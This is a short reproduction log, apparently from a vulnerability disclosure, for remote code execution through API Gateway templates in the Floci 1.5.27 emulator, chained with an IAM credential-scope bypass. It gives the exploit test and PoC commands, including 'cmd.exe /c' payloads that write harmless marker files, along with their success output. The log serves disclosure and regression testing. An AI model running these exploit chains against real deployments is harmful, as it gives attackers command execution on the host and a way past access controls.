44 lines
1.7 KiB
Plaintext
44 lines
1.7 KiB
Plaintext
Target:
|
|
Floci 1.5.27
|
|
Original RCE commit analyzed: 238294e779d0cd24835ba04d7bb16b1e1fd15f76
|
|
Latest upstream commit rechecked for IAM bypass chain: 7efb280dbcf6f5ea8faab28f1c7d5f8c3f59b4e0
|
|
|
|
Original JUnit RCE command:
|
|
.\mvnw.cmd '-Denforcer.skip=true' '-Dmaven.compiler.release=21' '-Dmaven.compiler.enablePreview=true' '-DargLine=--enable-preview' '-Dtest=ApiGatewayVtlRceExploitTest' test
|
|
|
|
Original JUnit RCE result:
|
|
Tests run: 1, Failures: 0, Errors: 0, Skipped: 0
|
|
target\apigw-vtl-rce-marker.txt => FLOCI_APIGW_VTL_RCE
|
|
|
|
Original standalone PoC command:
|
|
python poc.py --host 127.0.0.1 --port 4566 --argv cmd.exe /c "echo FLOCI_STANDALONE_POC>C:/Temp/floci_standalone_poc.txt"
|
|
|
|
Original standalone PoC result:
|
|
[+] REST API id: d1e873f2f8
|
|
[+] Resource id: cfd975b9
|
|
[+] Trigger response: {"ok":true,"exit":"0"}
|
|
[+] Command executed by Floci process
|
|
[+] Cleanup delete REST API: HTTP 202
|
|
POC_EXIT=0
|
|
MARKER_EXISTS=True
|
|
C:\Temp\floci_standalone_poc.txt => FLOCI_STANDALONE_POC
|
|
|
|
IAM bypass regression command:
|
|
.\mvnw.cmd -Dtest=ApiGatewayIamBypassRegressionTest test
|
|
|
|
IAM bypass regression result:
|
|
Tests run: 1, Failures: 0, Errors: 0, Skipped: 0
|
|
Correct apigateway credential scope was denied:
|
|
HTTP 403
|
|
IAM enforcement DENY: action=apigateway:POST
|
|
Wrong iam credential scope was allowed with the same access key:
|
|
Created REST API
|
|
Created API Gateway resource
|
|
Stored responseTemplates entry
|
|
Created deployment and stage
|
|
Executed /execute-api/{apiId}/prod/probe
|
|
Observed template-controlled HTTP 207 response
|
|
|
|
Standalone wrong-scope bypass command shape:
|
|
python poc.py --host 127.0.0.1 --port 4566 --bypass-iam --auth-access-key AKIAEXAMPLE --argv cmd.exe /c "echo FLOCI_BYPASS_CHAIN>C:/Temp/floci_bypass_chain.txt"
|